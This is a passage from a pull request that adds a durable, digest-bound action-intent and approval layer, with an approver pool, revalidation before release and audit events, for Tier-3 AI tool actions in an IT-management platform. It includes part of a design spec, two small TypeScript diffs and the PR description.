+  CHECK exactly one of the two is set; `source` enum `chat | mcp_api`;
+  `requesting_client_label` (MCP client name / session label).
+
+Immutable action content (UPDATE-blocked by trigger, §3.4):
+- `action_name`, `action_version` int; `arguments` jsonb (canonicalized: sorted keys,
+  no undefined, stable number formatting); `argument_digest` char(64) — SHA-256 hex of
+  the canonical JSON; `target_summary` text; `impact_summary` text; `reason` text
+  nullable; `risk_tier` smallint (3 only in v1; column exists for future T2-policy
+  use); `connection_id` / `tenant_id` nullable (M365 mutation forward-compat);
+  `idempotency_key` text — UNIQUE `(org_id, idempotency_key)`; `correlation_id` uuid.
+
+Lifecycle (mutable):
+- `status` enum `pending_approval | approved | executing | completed | failed |
+  rejected | expired | cancelled`; `created_at`; `expires_at`; `decided_at`;
+  `decided_assurance_level` / `decided_via` / `decided_by_user_id` (mirrored from the
+  winning approval); `executed_at`; `result` jsonb (sanitized, size-capped); 
+  `error_code` text.
+
+RLS: `breeze_has_org_access(org_id)` + system, forced. Registered in
+`CORE_ORG_CASCADE_DELETE_ORDER` and the RLS coverage test in the same PR.
+
+### 3.2 `intent_outbox` (new; same migration)
+
+`id` bigserial PK; `intent_id` FK NOT NULL; `event_type` enum `intent_created |
+intent_approved`; `payload` jsonb (ids only, no argument
+content); `created_at`; `published_at` nullable; `publish_attempts` int default 0.
+Written in the **same transaction** as the intent row / status transition it
+announces. System-scoped (no org RLS; workers only), like `device_commands` —
+documented as INTENTIONAL_UNSCOPED with the same justification pattern. Cascade: FK
+`ON DELETE CASCADE` from `action_intents`.
+
+### 3.3 `approval_requests` extension
+
+New nullable `intent_id` uuid FK → `action_intents(id)` ON DELETE CASCADE, sitting
+beside the existing `execution_id` and `elevation_request_id` links. One intent fans
+out to N approver rows (one per eligible approver). Enforce "at most one of
+`execution_id` / `elevation_request_id` / `intent_id` is set" — extend the existing
+CHECK if one exists, else add it (verify against the shipped schema at
+implementation time). Intent-linked approval rows never carry `execution_id`: the
+execution-ledger linkage lives on the intent side (§6.1), not the approval row. The digest is carried in `action_arguments`' sibling — a new
+`bound_argument_digest` char(64) nullable column — so the decision row itself records
+what content was approved.
+
+### 3.4 State machine and integrity
+
+```
+pending_approval ──approve──▶ approved ──release──▶ executing ──▶ completed
+      │  │  │                    │                      └───────▶ failed
+      │  │  └──deny────────────▶ rejected (terminal)
+      │  └─────expire──────────▶ expired  (terminal)
+      └────────cancel──────────▶ cancelled (terminal; also legal from approved)
+```
+
+- Every transition is `UPDATE … WHERE id = $1 AND status = $expected` (CAS); zero rows
+  = lost race, caller re-reads. `approved → executing` is the single-use release guard
+  (PAM `actuating` pattern) — a job retry that finds `executing`/terminal does nothing.
+- A BEFORE UPDATE trigger rejects changes to the §3.1 immutable columns
+  (`RAISE EXCEPTION 'action_intents content is immutable'`). Material edits = new
+  intent + new approvals, per parent spec §10.2.
+- Expiry defaults: `chat` → 5 minutes (current UX); `mcp_api` → 24 hours. Constants,
+  not env vars. The existing reaper pattern (30s BullMQ sweep, `FOR UPDATE SKIP
+  LOCKED`, cap 500) gets an intent sweep: `pending_approval`/`approved` past
+  `expires_at` → `expired`, linked approval rows expired, one audit event each.
+  `approved` intents expire too — approval does not stop the clock; execution must
+  begin before `expires_at`.
+
+## 4. Intent creation
+
+`services/actionIntents/intentService.ts` — `createActionIntent(auth, {toolName,
+input, reason?, source})`:
+
+1. Resolve tier via `getToolTier` + `checkGuardrails` (existing). Tier ≤ 2 → not an
+   intent path; T4 → refused outright.
+2. Resolve org (session org / `resolveWritableToolOrgId`); canonicalize args; compute
+   digest; build target/impact summaries from the tool's definition (v1: tool
+   description + a per-tool optional summarizer hook; default = tool name + top-level
+   arg keys with values truncated).
+3. Idempotency: caller-supplied key (MCP `idempotencyKey` param) or derived
+   `sha256(actor + action + digest)` for chat. Insert conflict on
+   `(org_id, idempotency_key)` returns the EXISTING intent (status included) instead
+   of creating a duplicate — retries converge, per parent spec §13.
+4. Resolve eligible approvers: users with org access and `approvals:decide` (new RBAC
+   permission; seeded to org-admin and partner-admin roles by migration). Exclude the
+   requester. If non-empty → create one `approval_requests` row per approver (digest
+   bound, `expiresAt` = intent's), push via `dispatchApprovalPushToTokens`, web queue
+   picks them up as today. If empty and requester is eligible → sole-operator row for
+   the requester flagged `requires_assurance_level: 3`. If empty and requester is not
+   eligible → intent created then immediately `cancelled` with
+   `error_code = 'no_eligible_approvers'` (fail closed, visible in audit).
+5. Intent row + `intent_created` outbox row in one transaction.
+
+Decision handling extends `routes/approvals.ts`'s existing decide handler: when the
+approval row has `intent_id`, the first-wins CAS also (same txn) transitions the
+intent `pending_approval → approved|rejected`, stamps decider/assurance, expires
+sibling rows, writes an `intent_approved` outbox row on approval. Sole-operator rows
+enforce assurance ≥ 3 before the CAS (reusing the step-up machinery in
+`approverWebAuthn.ts`); decisions below the bar are refused with the existing
+StepUpRequiredError flow.
+
+## 5. Outbox publisher and release worker
+
+- `jobs/intentOutboxPublisher.ts`: 5s repeatable BullMQ job; claims unpublished rows
+  (`FOR UPDATE SKIP LOCKED`, cap 200), enqueues the corresponding queue job (jobId =
+  `intent-<eventType>-<intentId>` — no colons), marks `published_at`. Re-publishing is
+  harmless: consumers are CAS-idempotent. Stuck rows (attempts > 5) alarm via the
+  existing job-failure logging.
+- `jobs/intentReleaseWorker.ts` consumes `intent_approved`:
+  1. CAS `approved → executing`; zero rows → done (raced with expiry/cancel/retry).
+  2. **Revalidate** (all fail-closed, intent → `failed` with a categorized
+     `error_code`, never silent):
+     - winning approval still `approved` and its `bound_argument_digest` equals the
+       intent's `argument_digest`;
+     - tool exists and `getToolTier(tool)` has not **increased** since creation
+       (increase → `failed: tier_escalated`);
+     - actor still valid: user active with required RBAC, or API key unrevoked with
+       required scopes — rebuild the `AuthContext` via a new
+       `services/actionIntents/actorContext.ts` (`buildAuthContextForIntent`), which
+       reuses the same permission/site resolution the auth middlewares use;
+     - org active; for intents carrying `connection_id`: connection status still
+       executable and manifest version unchanged (dormant until M365 mutations).
+  3. Execute through the existing `executeTool` path (guardrails, execution ledger,
+     device gates, audit) with the rebuilt context.
+  4. CAS `executing → completed|failed`; store sanitized result (cap 64 KiB; oversize
+     → result replaced by `{truncated: true}` + `error_code: result_too_large` is NOT
+     set — completion stands, result is just capped).
+
+## 6. Caller surfaces
+
+### 6.1 Chat SDK (`aiAgentSdk.ts`)
+
+T3 flow becomes intent-backed: create intent (source `chat`) instead of a bare
+approval row; `waitForApproval` polls **intent** status. Fast path: when approval
+lands while the session is alive, the session executes inline exactly as today —
+inline execution performs the same CAS `approved → executing`, so the release worker
+and the session can never double-execute. If the session is gone when approval lands,
+the release worker finishes and the result is in the intent for later retrieval.
+`ai_tool_executions` keeps its role as the execution ledger; the intent references it
+via the winning approval row's existing `execution_id` when inline, or the worker
+creates the ledger row when durable.
+
+### 6.2 External MCP (`routes/mcpServer.ts`) — the hard cutover
+
+- The T3 auto-execute branch (`runTier3ToolLifecycle` direct call) is **deleted**.
+- `tools/call` on a T3 tool → `createActionIntent(source: 'mcp_api')` → structured
+  response: `{ state: 'pending_approval', intentId, approvalIds, expiresAt }`.
+- New MCP tools: `get_action_status({intentId})` → `{state, result?, errorCode?,
+  expiresAt}` mapped 1:1 from intent status (parent spec §10.4 states); 
+  `cancel_action({intentId})` → CAS to `cancelled` from `pending_approval|approved`,
+  requester-or-approver only.
+- `ai:execute` scope now authorizes *requesting* T3 work only. `ai:execute_admin` and
+  the prod allowlist continue to gate which tools may be requested at all.
+- Scope model, T1/T2 behavior, rate limits: unchanged.
+
+### 6.3 Approval UI
+
+The web approval detail and mobile push payloads gain: org (and MS tenant when
+present), requester + client label + source, action name/version, target/impact
+summaries, blast-radius arg summary, reason, expiry. No new screens.
+
+## 7. Audit and metrics
+
+Audit events (existing `writeAuditEvent`, org-scoped): `action_intent.created`,
+`.approved`, `.rejected`, `.expired`, `.cancelled`, `.executed` (result:
+success/failure), `.self_approved_sole_operator`. Details carry ids, action name,
+digest, decider, assurance — never argument contents beyond the summaries.
+Prometheus: `breeze_action_intents_total{source,action,outcome}` and
+`breeze_intent_outbox_lag_seconds` (age of oldest unpublished row, gauge).
+
+## 8. Failure modes
+
+| Condition | Behavior |
+|---|---|
+| No eligible approvers and requester ineligible | Intent `cancelled`, `no_eligible_approvers`, audited |
+| Approval after expiry | Decide CAS fails (row expired); caller sees "Already expired" |
+| Concurrent approve+deny | First CAS wins; loser gets "Already decided" |
+| Worker crash mid-execution | Intent stuck `executing`; stale-executing sweep (reaper) flips to `failed: execution_lost` after 2× tool timeout; idempotency key lets the caller safely re-request |
+| Digest mismatch at release | `failed: digest_mismatch` (should be impossible; defense-in-depth) |
+| Tool tier raised after intent creation | `failed: tier_escalated` |
+| Actor disabled / key revoked before release | `failed: actor_invalid` |
+| Duplicate MCP request (same idempotency key) | Same intent returned; no second side effect |
+| Redis/BullMQ down at approval time | Outbox row persists; publisher drains on recovery |
+
+## 9. Testing
+
+- CAS races: concurrent approve/deny, approve/expire, double release (property: at
+  most one `executing` transition ever succeeds).
+- Immutability trigger: UPDATE on content columns raises.
+- Outbox: crash between intent-insert and publish → publisher delivers later,
+  exactly-once effect via CAS consumers.
+- Revalidation matrix: digest tamper, tier bump, disabled user, revoked key, expired
+  approval.
+- Sole-operator: assurance < 3 refused; multi-approver orgs never offer requester a row.
+- RLS + cascade contract tests for `action_intents` (org forge 42501; cascade order).
+- MCP integration: T3 call → pending_approval → approve via API → status poll returns
+  completed with sanitized result; cancel path; idempotent re-request.
+- Chat regression: fast-path approval still executes inline; session-death path
+  completes via worker.
+
+## 10. Delivery split
+
+- **Plan 1 (additive, no behavior change):** schema + migration, intent service,
+  fan-out, decide-handler extension, outbox + publisher + reapers, release worker,
+  chat SDK integration behind the intent path, audit/metrics, UI field additions.
+- **Plan 2 (the cutover):** MCP T3 rewiring, `get_action_status` / `cancel_action`
+  tools, deletion of the auto-execute branch, release-notes/breaking-change docs,
+  end-to-end MCP integration tests.

--- a/packages/shared/src/constants/permissions.ts
+++ b/packages/shared/src/constants/permissions.ts
@@ -123,6 +123,10 @@ export const PERMISSION_GRANTS = {
   // cross-user admin/audit surface must NOT be gated on organizations:read.
   AI_SESSIONS_READ_ALL: { resource: 'ai_sessions', action: 'read_all' },
 
+  // Action intents / durable approvals — gates who may decide (approve/deny) a
+  // pending action-intent approval, distinct from creating/reading intents.
+  APPROVALS_DECIDE: { resource: 'approvals', action: 'decide' },
+
   // Admin
   ADMIN_ALL: { resource: '*', action: '*' },
 } as const;

--- a/packages/shared/src/types/ai.ts
+++ b/packages/shared/src/types/ai.ts
@@ -118,7 +118,7 @@ export type AiStreamEvent =
   | { type: 'content_delta'; delta: string }
   | { type: 'tool_use_start'; toolName: string; toolUseId: string; input: Record<string, unknown> }
   | { type: 'tool_result'; toolUseId: string; output: unknown; isError: boolean }
-  | { type: 'approval_required'; executionId: string; approvalRequestId?: string; toolName: string; input: Record<string, unknown>; description: string; requiresAdminApproval?: boolean; deviceContext?: { hostname: string; displayName?: string; status: string; lastSeenAt?: string; activeSessions?: Array<{ username: string; activityState?: string; idleMinutes?: number; sessionType: string }> } }
+  | { type: 'approval_required'; executionId: string; approvalRequestId?: string; toolName: string; input: Record<string, unknown>; description: string; requiresAdminApproval?: boolean; deviceContext?: { hostname: string; displayName?: string; status: string; lastSeenAt?: string; activeSessions?: Array<{ username: string; activityState?: string; idleMinutes?: number; sessionType: string }> }; intentBacked?: boolean }
   | { type: 'plan_approval_required'; planId: string; steps: ActionPlanStep[] }
   | { type: 'plan_step_start'; planId: string; stepIndex: number; toolName: string }
   | { type: 'plan_step_complete'; planId: string; stepIndex: number; toolName: string; isError: boolean }


### PR DESCRIPTION
## Summary

Plan 1 of the durable **action-intents & approval layer** from `docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md`. Makes every Tier-3 tool action a **digest-bound, durable intent** approved through an org **approver pool with four-eyes** semantics, executed by a release worker that **re-validates before running with a reconstructed actor identity**. First consumer is the chat AI agent's Tier-3 flow.

Ships behind existing tier gating — no new user-facing capability until consumers adopt it. **This is Plan 1; the external-MCP Tier-3 bypass cutover is a separate Plan 2** (its prerequisite is this being deployed).

## What's in it

- **Immutable intents** (`action_intents`): canonicalized args + SHA-256 digest, content columns UPDATE-blocked by trigger, dual-axis org RLS, partial idempotency index over live statuses.
- **Transactional outbox** (`intent_outbox`, ids-only) + 5s publisher (DB-context released before the Redis enqueue) + expiry/stale-executing sweeps.
- **Approver fan-out** across **both org and partner axes** filtered by a new `approvals:decide` permission, under system context (the fan-out writes cross-user `approval_requests` rows). Sole-operator self-approval requires L3 (WebAuthn/hardware-key) step-up.
- **Release worker** with a fail-closed revalidation chain — digest match → tier-not-escalated → actor-still-valid → **still-holds-the-specific-tool RBAC** → org-active — before `executeTool`. Single `approved→executing` CAS is the mutual-exclusion point with the live chat session (no double execution).
- **Chat Tier-3** rebuilt on intents; tier-2 `per_step` kept on its legacy path. Web approve honestly surfaces "waiting for an approver" for intent-backed actions instead of silently self-approving.
- `approvals:decide` **seed migration** for existing environments (Org Admin roles); digest-mismatch refusals audited.

## Review

Built subagent-driven (per-task spec+quality reviews) + two whole-branch reviews. The first whole-branch review found the durable/CAS/revalidation **core merge-quality** but caught **3 Criticals in the consumer wiring that the mocked suite could not see** — all fixed here:
1. fan-out was RLS-42501'ing under the requester's org context (now system-scoped);
2. approver pool excluded partner-scope MSP users (now both axes);
3. web chat approve silently no-oped Tier-3 (now honest four-eyes).
Plus ~7 Critical/Important bugs caught during per-task review (immutability-trigger coverage, `intent_outbox` RLS deny, publisher #1105 txn-across-enqueue, release-time RBAC recheck, tier-2 regression). A real-Postgres RLS-forge integration test now guards the fan-out fix.

## Verification

- Full API suite **15,098 passed / 0 failed**; web **4,143 passed / 0 failed**; `tsc --noEmit` clean; eslint clean.
- `intentFanout.integration.test.ts` (real Postgres) proves cross-org+partner fan-out — **CI-run** (couldn't execute against the shared local :5433 container, which carries another branch's migration ledger).
- Local `db:check-drift` failed only on that same shared-DB contamination (other-branch ledger + unrelated `workspace` extension); CI applies migrations fresh.

🤖 Generated with [Claude Code](https://claude.com/claude-code)